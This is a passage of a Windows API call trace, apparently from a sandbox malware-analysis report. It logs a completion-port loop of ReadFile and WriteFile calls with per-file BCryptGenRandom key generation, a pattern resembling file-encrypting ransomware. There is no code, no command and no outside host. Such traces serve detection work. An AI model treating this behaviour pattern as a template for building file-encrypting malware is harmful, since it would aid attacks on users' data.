lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.982] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.994] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1c06, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.995] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.995] CloseHandle (hObject=0x3cc) returned 1 [0196.995] free (_Block=0x3df0008) [0196.995] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0197.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0197.006] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.006] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.006] free (_Block=0x3e305b8) [0197.006] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.007] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.007] free (_Block=0x1fa91d0) [0197.007] free (_Block=0x1fa2ed8) [0197.007] free (_Block=0x1fa90b8) [0197.007] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.007] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.009] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5d80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.011] CloseHandle (hObject=0x3cc) returned 1 [0197.011] free (_Block=0x3df0008) [0197.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0197.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0197.021] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.021] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.021] free (_Block=0x3e305b8) [0197.021] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.021] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.022] free (_Block=0x1fa91d0) [0197.022] free (_Block=0x1fa2ed8) [0197.022] free (_Block=0x1fa90b8) [0197.022] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.023] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2dd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.035] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1aea, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.036] CloseHandle (hObject=0x3cc) returned 1 [0197.036] free (_Block=0x3df0008) [0197.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.045] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0197.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0197.046] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.046] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.046] free (_Block=0x3e305b8) [0197.046] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.047] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.047] free (_Block=0x1fa91d0) [0197.047] free (_Block=0x1fa2ed8) [0197.047] free (_Block=0x1fa90b8) [0197.047] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.049] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3840, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.049] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.061] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x78a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.062] CloseHandle (hObject=0x3cc) returned 1 [0197.062] free (_Block=0x3df0008) [0197.062] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.071] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0197.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0197.072] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.072] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.073] free (_Block=0x3e305b8) [0197.073] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.073] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.073] free (_Block=0x1fa91d0) [0197.073] free (_Block=0x1fa2ed8) [0197.073] free (_Block=0x1fa90b8) [0197.073] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.073] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.074] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.087] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x58e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.087] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.088] CloseHandle (hObject=0x3cc) returned 1 [0197.088] free (_Block=0x3df0008) [0197.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0197.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0197.107] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.107] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.107] free (_Block=0x3e305b8) [0197.107] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.107] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.108] free (_Block=0x1fa91d0) [0197.108] free (_Block=0x1fa2ed8) [0197.108] free (_Block=0x1fa90b8) [0197.108] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.123] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.136] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xf5c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0197.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.149] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xee0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0197.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.160] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x30da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.181] CloseHandle (hObject=0x3cc) returned 1 [0197.182] free (_Block=0x3df0008) [0197.182] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.197] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x77f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0197.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0197.213] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x80f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0197.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0199.428] CloseHandle (hObject=0x3cc) returned 1 [0199.428] free (_Block=0x3d70450) [0199.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0199.438] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9540, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0199.453] CloseHandle (hObject=0x2a4) returned 1 [0199.453] free (_Block=0x3f70048) [0199.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0199.469] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0199.469] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0199.528] CloseHandle (hObject=0x338) returned 1 [0199.528] free (_Block=0x3df0008) [0199.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0199.537] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x60e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0199.544] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0199.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0199.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0199.555] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.555] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.555] free (_Block=0x3e305b8) [0199.555] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.555] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.556] free (_Block=0x1fa91d0) [0199.556] free (_Block=0x1fa2ed8) [0199.556] free (_Block=0x1fa90b8) [0199.556] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0199.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0199.566] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0199.566] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0199.575] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1f64, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0199.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0199.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0199.600] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.600] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.600] free (_Block=0x3e305b8) [0199.600] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.600] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.600] free (_Block=0x1fa91d0) [0199.600] free (_Block=0x1fa2ed8) [0199.601] free (_Block=0x1fa90b8) [0199.601] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0200.860] CloseHandle (hObject=0x308) returned 1 [0200.860] free (_Block=0x1ff1e60) [0200.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0200.868] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, 